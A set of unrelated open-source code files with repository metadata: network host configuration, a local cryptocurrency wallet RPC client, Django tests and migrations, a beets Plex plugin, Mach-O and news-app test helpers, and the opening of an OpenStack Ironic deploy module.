'ssid': settings.DEFAULT_WIRELESS_ESSID,
'mode': 'ap',
'network': 'lan'
}
if settings.DEFAULT_WIRELESS_KEY:
new_iface['encryption'] = "psk2"
new_iface['key'] = settings.DEFAULT_WIRELESS_KEY
config['wifi-interfaces'].append(new_iface)
return config
def prepareHostConfig(devices=None, hostConfigPath=None, write=True):
"""
Load an existing host configuration or generate one.
Tries to load host configuration from persistent file. If that does not
work, it will try to automatically generate a working configuration.
write: if True and host config was automatically generated, then write
the new host config to a file.
"""
config = load(hostConfigPath)
if config is not None:
return config
if devices is None:
devices = config_devices.detectSystemDevices()
config = generateHostConfig(devices)
if write:
save(config)
return config
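# A short usage sketch (assuming a host whose network devices are
# detectable; write=False keeps the generated config off disk):
#
#   devices = config_devices.detectSystemDevices()
#   config = prepareHostConfig(devices, write=False)
#   config['lan']['ipaddr']  # settings.DEFAULT_LAN_ADDRESS by default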
#
# Chute update operations
#
def getHostConfig(update):
"""
Load host configuration.
Read device information from networkDevices.
Store host configuration in hostConfig.
"""
# TODO We need to check for changes in hardware. If a new device was
# added, we should try to automatically configure it. If a device was
# removed, we should be aware of what is no longer valid.
devices = update.cache_get('networkDevices')
config = prepareHostConfig(devices)
# update.old is not guaranteed to contain the old host configuration, so
# save a backup copy in update.new. This will be used by revertHostConfig
# if we need to back out.
update.cache_set('oldHostConfig', config)
# If this is a sethostconfig operation, then read the host config from the
# update object. Ordinary chute operations should not alter the host
# configuration.
if update.updateType == 'sethostconfig':
config = update.hostconfig
elif update.updateType == 'patchhostconfig':
config = jsonpatch.apply_patch(config, update.patch)
# For factoryreset, try to load the default configuration or automatically
# generate a new one if the file is not found.
elif update.updateType == 'factoryreset':
config = prepareHostConfig(devices,
hostConfigPath=settings.DEFAULT_HOST_CONFIG_FILE)
update.cache_set('hostConfig', config)
def setHostConfig(update):
"""
Write host configuration to persistent storage.
Read host configuration from hostConfig.
"""
config = update.cache_get('hostConfig')
save(config)
def revertHostConfig(update):
"""
Restore host configuration from before update.
Uses oldHostConfig cache entry.
"""
config = update.cache_get('oldHostConfig')
save(config)
|
{
"content_hash": "9e53a4465098dfb0a87f26f78dfd66eb",
"timestamp": "",
"source": "github",
"line_count": 329,
"max_line_length": 85,
"avg_line_length": 28.145896656534955,
"alnum_prop": 0.588012958963283,
"repo_name": "ParadropLabs/Paradrop",
"id": "109114c520fc223a5a6b853a68b21211304f3707",
"size": "9260",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "paradrop/daemon/paradrop/core/config/hostconfig.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "148071"
},
{
"name": "Dockerfile",
"bytes": "10449"
},
{
"name": "HTML",
"bytes": "554"
},
{
"name": "Makefile",
"bytes": "1665"
},
{
"name": "Python",
"bytes": "1049444"
},
{
"name": "Shell",
"bytes": "9897"
}
],
"symlink_target": ""
}
|
from jsonrpc import ServiceProxy
import sys
import string
import getpass
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:9332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:9332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "encryptwallet":
try:
pwd = getpass.getpass(prompt="Enter passphrase: ")
pwd2 = getpass.getpass(prompt="Repeat passphrase: ")
if pwd == pwd2:
access.encryptwallet(pwd)
print "\n---Wallet encrypted. Server stopping, restart to run with encrypted wallet---\n"
else:
print "\n---Passphrases do not match---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Octocoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Octocoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
            print access.getwork(data)
        except:
            print access.getwork()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
        gen = raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = getpass.getpass(prompt="Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = getpass.getpass(prompt="Enter old wallet passphrase: ")
pwd2 = getpass.getpass(prompt="Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
|
{
"content_hash": "3cb827b83781815be24670cf30eea434",
"timestamp": "",
"source": "github",
"line_count": 337,
"max_line_length": 101,
"avg_line_length": 28.679525222551927,
"alnum_prop": 0.5685463010863943,
"repo_name": "my-first/octocoin",
"id": "b3ac04b2a25cd1b74231bcd28aed3ef684e0abe3",
"size": "9665",
"binary": false,
"copies": "2",
"ref": "refs/heads/master-0.10",
"path": "contrib/bitrpc/bitrpc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7639"
},
{
"name": "C",
"bytes": "343323"
},
{
"name": "C++",
"bytes": "3532257"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "Groff",
"bytes": "18088"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "144762"
},
{
"name": "Makefile",
"bytes": "83451"
},
{
"name": "Objective-C",
"bytes": "2023"
},
{
"name": "Objective-C++",
"bytes": "7240"
},
{
"name": "Protocol Buffer",
"bytes": "2309"
},
{
"name": "Python",
"bytes": "222283"
},
{
"name": "QMake",
"bytes": "2020"
},
{
"name": "Shell",
"bytes": "40592"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from quotes.models import Quote
class QuoteTestCase(TestCase):
def test_create(self):
ts = Quote(author="A", text="ABC")
ts.save()
self.assertEqual(str(ts), "A ABC")
|
{
"content_hash": "22cdfbb36cd5b8911e44ae6bb5423b28",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 42,
"avg_line_length": 22.9,
"alnum_prop": 0.6506550218340611,
"repo_name": "eged/cmsplugin-quotes",
"id": "5ab603a5f7c4ab01c2e7e6a069d379306b528514",
"size": "229",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cmsplugin_quotes/tests/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "8423"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0034_simplify_transfer_status'),
]
operations = [
migrations.AddField(
model_name='layer',
name='max_x',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layer',
name='max_y',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layer',
name='min_x',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layer',
name='min_y',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layerimage',
name='max_x',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layerimage',
name='max_y',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layerimage',
name='min_x',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layerimage',
name='min_y',
field=models.FloatField(default=None, null=True, blank=True),
),
]
|
{
"content_hash": "60a64594b8fd70ffd84b20c8b6e1d538",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 73,
"avg_line_length": 30.641509433962263,
"alnum_prop": 0.5431034482758621,
"repo_name": "kdeloach/raster-foundry",
"id": "eb9c50a7f96b5e0a42f4556d835fd1566f81a3a6",
"size": "1648",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/rf/apps/core/migrations/0035_add_image_layer_bounding_box.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "125238"
},
{
"name": "HTML",
"bytes": "146101"
},
{
"name": "JavaScript",
"bytes": "146746"
},
{
"name": "Python",
"bytes": "261223"
},
{
"name": "Ruby",
"bytes": "1213"
},
{
"name": "Shell",
"bytes": "10179"
}
],
"symlink_target": ""
}
|
"""Updates an Plex library whenever the beets library is changed.
Put something like the following in your config.yaml to configure:
plex:
host: localhost
port: 32400
"""
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import requests
from urlparse import urljoin
import xml.etree.ElementTree as ET
from beets import config
from beets.plugins import BeetsPlugin
def get_music_section(host, port):
"""Getting the section key for the music library in Plex.
"""
api_endpoint = 'library/sections'
url = urljoin('http://{0}:{1}'.format(host, port), api_endpoint)
# Sends request.
r = requests.get(url)
# Parse xml tree and extract music section key.
tree = ET.fromstring(r.text)
for child in tree.findall('Directory'):
if child.get('title') == 'Music':
return child.get('key')
def update_plex(host, port):
"""Sends request to the Plex api to start a library refresh.
"""
# Getting section key and build url.
section_key = get_music_section(host, port)
api_endpoint = 'library/sections/{0}/refresh'.format(section_key)
url = urljoin('http://{0}:{1}'.format(host, port), api_endpoint)
# Sends request and returns requests object.
r = requests.get(url)
return r
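# A minimal sketch of driving the helpers directly (assuming a reachable
# Plex server on the default host/port used by this plugin):
#
#   r = update_plex('localhost', 32400)
#   r.status_code  # 200 when the refresh request was accepted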
class PlexUpdate(BeetsPlugin):
def __init__(self):
super(PlexUpdate, self).__init__()
# Adding defaults.
config['plex'].add({
u'host': u'localhost',
u'port': 32400})
self.register_listener('database_change', self.listen_for_db_change)
def listen_for_db_change(self, lib, model):
"""Listens for beets db change and register the update for the end"""
self.register_listener('cli_exit', self.update)
def update(self, lib):
"""When the client exists try to send refresh request to Plex server.
"""
self._log.info('Updating Plex library...')
# Try to send update request.
try:
update_plex(
config['plex']['host'].get(),
config['plex']['port'].get())
self._log.info('... started.')
except requests.exceptions.RequestException:
self._log.warning('Update failed.')
|
{
"content_hash": "9625c585e7327f0f42ce75ee6ca8f84d",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 77,
"avg_line_length": 30.68,
"alnum_prop": 0.6205997392438071,
"repo_name": "ttsda/beets",
"id": "5aa096486ef99448792248b1eac638f557c76890",
"size": "2301",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "beetsplug/plexupdate.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2951"
},
{
"name": "HTML",
"bytes": "3307"
},
{
"name": "JavaScript",
"bytes": "85950"
},
{
"name": "Python",
"bytes": "1525413"
},
{
"name": "Shell",
"bytes": "7413"
}
],
"symlink_target": ""
}
|
import contextlib
import shutil
import tempfile
import unittest
import os.path as op
import macholib
DYLIB_DIRECTORY = op.join(op.dirname(__file__), "data")
FOO_DYLIB = op.join(DYLIB_DIRECTORY, "foo.dylib")
FILES_TO_INSTALL_NAME = {
FOO_DYLIB: "foo.dylib",
op.join(DYLIB_DIRECTORY, "foo2.dylib"): "yoyo.dylib",
}
FILES_TO_RPATHS = {
FOO_DYLIB: [],
op.join(DYLIB_DIRECTORY, "foo_rpath.dylib"): ["@loader_path/../lib"],
}
SIMPLE_MAIN = op.join(DYLIB_DIRECTORY, "main")
FILES_TO_DEPENDENCY_NAMES = {
SIMPLE_MAIN: ["bar.1.0.0.dylib", "/usr/lib/libSystem.B.dylib"]
}
SIMPLE_BUNDLE = op.join(DYLIB_DIRECTORY, "foo.bundle")
NO_MACHO_FILE = op.join(DYLIB_DIRECTORY, "Makefile")
TINY_FILE = op.join(DYLIB_DIRECTORY, "tiny")
@contextlib.contextmanager
def mkdtemp():
    d = tempfile.mkdtemp()
    try:
        yield d
    finally:
        # Clean up even if the with-body raised.
        shutil.rmtree(d)
class BaseMachOCommandTestCase(unittest.TestCase):
def assert_commands_equal(self, filename, r_filename, filters=None):
"""Check that the mach-o header commands are the same in filename and
r_filename, except for the commands which id are in filter_ids."""
if filters is None:
filters = {}
r_m = macholib.MachO.MachO(r_filename)
m = macholib.MachO.MachO(filename)
# We don't really support multi-arch mach-o for now
self.assertEqual(len(r_m.headers), 1)
self.assertEqual(len(r_m.headers), len(m.headers))
r_header = r_m.headers[0]
header = m.headers[0]
self.assertEqual(len(r_header.commands), len(header.commands))
        for r_cmd, cmd in zip(r_header.commands, header.commands):
            # Use ``cmd_filter`` to avoid shadowing the builtin ``filter``.
            cmd_filter = filters.get(r_cmd[0].cmd, lambda x: x)
            self.assertEqual(cmd_filter(r_cmd), cmd_filter(cmd))
|
{
"content_hash": "4ea328abbbbc205d13f8b5e21e3ae7fa",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 77,
"avg_line_length": 28.80327868852459,
"alnum_prop": 0.6573705179282868,
"repo_name": "pombredanne/machotools",
"id": "5618bbaab24490090f08c58ac83ce805784d44ec",
"size": "1757",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "machotools/tests/common.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "211"
},
{
"name": "Makefile",
"bytes": "666"
},
{
"name": "Python",
"bytes": "34754"
}
],
"symlink_target": ""
}
|
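A hedged usage sketch of the helpers above: copy a fixture dylib into a
scratch directory and compare its load commands against the original. Nothing
here is from the test suite itself; it only relies on what the module defines.

import shutil
import os.path as op

with mkdtemp() as d:
    copy = op.join(d, "foo_copy.dylib")
    shutil.copy(FOO_DYLIB, copy)
    # Instantiating the TestCase by method name lets us call the assertion
    # outside a test runner.
    case = BaseMachOCommandTestCase("assert_commands_equal")
    case.assert_commands_equal(FOO_DYLIB, copy)  # identical headers expected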
import time
import unittest
from newsApp.clusterTableManager import ClusterTableManager
from newsApp.cluster import Cluster
class ClusterTableManagerTests(unittest.TestCase):
@classmethod
    def setUpClass(cls):
# construct the mock clusters to put
clusters = [
Cluster(['d1', 'd2', 'd3', 'd4', 'd5']),
Cluster(['e1'])
]
clusters[0].categories = str(['sports', 'national'])
clusters[1].categories = str(['business'])
clusters[0].countries = str(['india', 'nepal'])
clusters[1].countries = str(['india'])
clusters[0].locales = str(['bangalore', 'chennai'])
clusters[1].locales = str(['hyderabad'])
clusters[0].publishers = str(['TOI', 'Hindu', 'Deccan Herald'])
clusters[1].publishers = str(['Firstpost'])
clusters[0].languages = str(['en'])
clusters[1].languages = str(['es'])
clusters[0].duplicates = ['d4']
clusters[1].duplicates = []
        cls.clusters = clusters
        cls.clusterTableManager = ClusterTableManager()
        cls.clusterTableManager.createFreshTable()
        # wait for table to get created and add entries
        time.sleep(10)
        cls.clusterTableManager.addClusters(cls.clusters)
@classmethod
    def tearDownClass(cls):
        time.sleep(1)
        cls.clusterTableManager.deleteTable()
def testGet(self):
#simple get
result = self.clusterTableManager.getCluster(self.clusters[0].id)
self.assertEqual(result.id, self.clusters[0].id)
result = self.clusterTableManager.getCluster(self.clusters[1].id)
self.assertEqual(result.id, self.clusters[1].id)
def testQueries(self):
#query by category & country
result = self.clusterTableManager.queryByCategoryAndCountry('sports', 'nepal')
self.assertEqual(list(result)[0].id, self.clusters[0].id)
result = self.clusterTableManager.queryByCategoryAndCountry('business', 'india')
self.assertEqual(list(result)[0].id, self.clusters[1].id)
#query by locale
result = self.clusterTableManager.queryByLocale('bangalore')
self.assertEqual(list(result)[0].id, self.clusters[0].id)
result = self.clusterTableManager.queryByLocale('chennai')
self.assertEqual(list(result)[0].id, self.clusters[0].id)
result = self.clusterTableManager.queryByLocale('hyderabad')
self.assertEqual(list(result)[0].id, self.clusters[1].id)
def testDelete(self):
self.clusterTableManager.deleteCluster(self.clusters[0])
#just to ensure delete operation works if item isn't there
self.clusterTableManager.deleteCluster(self.clusters[0])
result = self.clusterTableManager.getCluster(self.clusters[0].id)
self.assertEqual(result, None)
self.clusterTableManager.addCluster(self.clusters[0])
|
{
"content_hash": "406c8f7ed6ff1a516bf2ac0758afdd00",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 84,
"avg_line_length": 35,
"alnum_prop": 0.7072356215213358,
"repo_name": "adityabansal/newsAroundMe",
"id": "109ef5d88b4c53579300bccb76c44ae6d7d9e0d8",
"size": "2695",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/clusterTableManager_testDisabled.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4444"
},
{
"name": "HTML",
"bytes": "13445"
},
{
"name": "JavaScript",
"bytes": "21507"
},
{
"name": "Python",
"bytes": "159005"
}
],
"symlink_target": ""
}
|
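The fixture above stores list-valued attributes (categories, countries, and so
on) as their str() form. A minimal sketch of reading such a value back with
ast.literal_eval; whether the real ClusterTableManager round-trips values this
way is an assumption.

import ast

stored = str(['sports', 'national'])   # what the fixture writes
categories = ast.literal_eval(stored)  # parse back into a list
assert categories == ['sports', 'national']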
"""Google Stackdriver Logging API wrapper."""
from pkg_resources import get_distribution
__version__ = get_distribution('google-cloud-logging').version
from google.cloud.logging.client import Client
ASCENDING = 'timestamp asc'
"""Query string to order by ascending timestamps."""
DESCENDING = 'timestamp desc'
"""Query string to order by decending timestamps."""
__all__ = ['__version__', 'ASCENDING', 'Client', 'DESCENDING']
|
{
"content_hash": "53c97aeb402612b5bf0cbd4288776177",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 62,
"avg_line_length": 28.8,
"alnum_prop": 0.7291666666666666,
"repo_name": "ammarkhann/FinalSeniorCode",
"id": "cced78370c6a6b8d5fbd6434d83316acaf3f3937",
"size": "1008",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "lib/python2.7/site-packages/google/cloud/logging/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "229289"
},
{
"name": "C++",
"bytes": "171536"
},
{
"name": "CSS",
"bytes": "928345"
},
{
"name": "Fortran",
"bytes": "14107"
},
{
"name": "HTML",
"bytes": "853239"
},
{
"name": "JavaScript",
"bytes": "4838516"
},
{
"name": "Jupyter Notebook",
"bytes": "518186"
},
{
"name": "Makefile",
"bytes": "214"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "81804894"
},
{
"name": "Roff",
"bytes": "6673"
},
{
"name": "Shell",
"bytes": "3409"
},
{
"name": "Smarty",
"bytes": "28408"
},
{
"name": "TeX",
"bytes": "1527"
},
{
"name": "XSLT",
"bytes": "366202"
}
],
"symlink_target": ""
}
|
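A hedged usage sketch of the ordering constants exported above; it assumes a
google-cloud-logging client of this vintage and valid default credentials.

from google.cloud import logging

client = logging.Client()
# Fetch entries newest-first using the DESCENDING query string.
for entry in client.list_entries(order_by=logging.DESCENDING):
    print(entry.timestamp, entry.payload)
    break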
"""
Start Test= 1365719423.979371
ms since start...
Network start = 1001.649857
Network started = 18143.102884
Mote start = 18151.414871
Mote detect start = 19177.054882
Mote detected = 19177.067995
Mote ping = 19177.072048
Mote reached = 28441.315889
Mote stopped = 28754.582882
Network stop = 28757.023811
Network stopped = 28757.169008
Stop Test = 29759.605885
"""
import os
import sys
import ast
import pylab
def parse_times(infile):
if not os.path.exists(infile):
        sys.exit(1)
time_relative = {}
time_delta = {}
with open(infile) as f:
for line in f:
if line.find(" = ") != -1:
rawinfo = line.split(" = ")
if "Ping stat" in rawinfo[0]:
time_relative[rawinfo[0]] = ast.literal_eval(rawinfo[1])
else:
time_relative[rawinfo[0]] = float(rawinfo[1])
time_delta["test"] = time_relative["Stop Test"]
time_delta["network-uptime"] = time_relative["Network stopped"] - time_relative["Network start"]
time_delta["network-start"] = time_relative["Network started"] - time_relative["Network start"]
time_delta["network-stop"] = time_relative["Network stopped"] - time_relative["Network stop"]
time_delta["mote-uptime"] = time_relative["Mote stopped"] - time_relative["Mote start"]
#time_delta["mote-start"] = time_relative["Mote detect start"] - time_relative["Mote start"]
time_delta["mote-stop"] = time_relative["Mote stopped"] - time_relative["Mote reached"]
time_delta["mote-detect"] = time_relative["Mote detected"] - time_relative["Mote start"]
time_delta["ping1"] = time_relative["Mote reached"] - time_relative["Mote ping"]
if time_relative.has_key("Moved mote ping"):
time_delta["pingm"] = time_relative["Moved mote reached"] - time_relative["Moved mote ping"]
elif time_relative.has_key("Mote ping2"):
time_delta["ping2"] = time_relative["Mote reached2"] - time_relative["Mote ping2"]
if time_relative.has_key("Ping stat"):
#time_relative["Ping stat"] = ast.literal_eval(time_relative["Ping stat"])
time_delta["ping2-stat"] = time_relative["Ping stat"]
time_delta["ping2-mean"] = pylab.mean(time_relative["Ping stat"])
time_delta["ping2-std"] = pylab.std(time_relative["Ping stat"])
time_delta["ping2-var"] = pylab.var(time_relative["Ping stat"])
return time_delta
if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(1)
parse_times(sys.argv[1])
|
{
"content_hash": "ac22c3edd201d1f36ebc56216e7a90fe",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 100,
"avg_line_length": 37.44776119402985,
"alnum_prop": 0.6388999601434835,
"repo_name": "bluerover/6lbr",
"id": "c77d79f7ff946a40c16467fddedcc8c656ac0e55",
"size": "2531",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "examples/6lbr/test/postprocessing/pp_time.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "119107"
},
{
"name": "Awk",
"bytes": "95"
},
{
"name": "C",
"bytes": "13501042"
},
{
"name": "C++",
"bytes": "1217325"
},
{
"name": "CSS",
"bytes": "6645"
},
{
"name": "HTML",
"bytes": "5676"
},
{
"name": "JavaScript",
"bytes": "10186"
},
{
"name": "Makefile",
"bytes": "49808"
},
{
"name": "Objective-C",
"bytes": "213752"
},
{
"name": "Perl",
"bytes": "17388"
},
{
"name": "Python",
"bytes": "19332"
},
{
"name": "Shell",
"bytes": "1686"
},
{
"name": "XSLT",
"bytes": "4947"
}
],
"symlink_target": ""
}
|
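A quick sketch of the "key = value" line convention that parse_times relies
on, using one line from the sample block quoted in the module docstring:

line = "Network start = 1001.649857"
key, value = line.split(" = ")
print("%s -> %.6f" % (key, float(value)))  # Network start -> 1001.649857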
import os
from oslo.config import cfg
from oslo.utils import strutils
from ironic.common import exception
from ironic.common.i18n import _
from ironic.common.i18n import _LE
from ironic.common.i18n import _LI
from ironic.common import image_service as service
from ironic.common import keystone
from ironic.common import states
from ironic.common import utils
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import image_cache
from ironic.drivers import utils as driver_utils
from ironic.openstack.common import fileutils
from ironic.openstack.common import log as logging
LOG = logging.getLogger(__name__)
# NOTE(rameshg87): This file now registers some of opts in pxe group.
# This is acceptable for now as a future refactoring into
# separate boot and deploy interfaces is planned, and moving config
# options twice is not recommended. Hence we would move the parameters
# to the appropriate place in the final refactoring.
pxe_opts = [
cfg.StrOpt('pxe_append_params',
default='nofb nomodeset vga=normal',
help='Additional append parameters for baremetal PXE boot.'),
cfg.StrOpt('default_ephemeral_format',
default='ext4',
help='Default file system format for ephemeral partition, '
'if one is created.'),
cfg.StrOpt('images_path',
default='/var/lib/ironic/images/',
help='Directory where images are stored on disk.'),
cfg.StrOpt('instance_master_path',
default='/var/lib/ironic/master_images',
help='Directory where master instance images are stored on '
'disk.'),
cfg.IntOpt('image_cache_size',
default=20480,
help='Maximum size (in MiB) of cache for master images, '
'including those in use.'),
# 10080 here is 1 week - 60*24*7. It is entirely arbitrary in the absence
# of a facility to disable the ttl entirely.
cfg.IntOpt('image_cache_ttl',
default=10080,
help='Maximum TTL (in minutes) for old master images in '
'cache.'),
cfg.StrOpt('disk_devices',
default='cciss/c0d0,sda,hda,vda',
help='The disk devices to scan while doing the deploy.'),
]
CONF = cfg.CONF
CONF.register_opts(pxe_opts, group='pxe')
@image_cache.cleanup(priority=50)
class InstanceImageCache(image_cache.ImageCache):
def __init__(self, image_service=None):
        super(InstanceImageCache, self).__init__(
CONF.pxe.instance_master_path,
# MiB -> B
cache_size=CONF.pxe.image_cache_size * 1024 * 1024,
# min -> sec
cache_ttl=CONF.pxe.image_cache_ttl * 60,
image_service=image_service)
def _get_image_dir_path(node_uuid):
"""Generate the dir for an instances disk."""
return os.path.join(CONF.pxe.images_path, node_uuid)
def _get_image_file_path(node_uuid):
"""Generate the full path for an instances disk."""
return os.path.join(_get_image_dir_path(node_uuid), 'disk')
def parse_instance_info(node):
"""Gets the instance specific Node deployment info.
This method validates whether the 'instance_info' property of the
supplied node contains the required information for this driver to
deploy images to the node.
:param node: a single Node.
:returns: A dict with the instance_info values.
